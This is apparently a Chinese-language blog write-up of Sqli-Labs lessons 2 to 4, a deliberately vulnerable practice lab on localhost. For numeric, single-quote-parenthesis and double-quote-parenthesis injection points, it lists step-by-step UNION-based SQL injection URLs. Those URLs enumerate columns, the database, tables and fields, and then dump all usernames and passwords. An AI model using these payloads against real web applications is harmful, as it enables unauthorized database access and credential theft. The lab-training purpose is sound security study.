Sqli-Labs:Less2-Less4

weixin_33758863發表於2018-07-24

Less2-Less4和Less1的查詢語句類似,只是引號及括號的區別。

Less2

基於錯誤_GET_數字型注入

http://localhost:8088/sqlilabs/Less-2/?id=1
http://localhost:8088/sqlilabs/Less-2/?id=1'
http://localhost:8088/sqlilabs/Less-2/?id=1"

13261830-b037cfb3ab0dab83.png

第一條正常,第二、第三條報錯:數字型注入
查詢語句:

select username,password from table_name where id=$_GET['id'] limit 0,1

http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+

3個欄位

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+

第2、第3欄位

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+

資料庫:security

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

欄位名:id、username、password

http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

END.

Less3

基於錯誤_GET_單引號_小括號_字元型注入

http://localhost:8088/sqlilabs/Less-3/?id=1
http://localhost:8088/sqlilabs/Less-3/?id=1'
http://localhost:8088/sqlilabs/Less-3/?id=1"

13261830-43425fcb92a247bd.png

第一、第三條正常,第二條報錯:字元型注入
查詢語句:

select username,password from table_name where id=('$_GET['id']') limit 0,1

http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+

3個欄位

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

第2、第3欄位

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+

資料庫:security

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

欄位名:id、username、password

http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

END.

Less4

基於錯誤_GET_雙引號_小括號_字元型注入

http://localhost:8088/sqlilabs/Less-4/?id=1
http://localhost:8088/sqlilabs/Less-4/?id=1'
http://localhost:8088/sqlilabs/Less-4/?id=1"

13261830-3798a1f3e83525ce.png

第一、第二條正常,第三條報錯:字元型注入
查詢語句:

select username,password from table_name where id=("$_GET['id']") limit 0,1

http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+

3個欄位

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+

第2、第3欄位

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+

資料庫:security

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名:users

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

欄位名:id、username、password

http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

END.

相關文章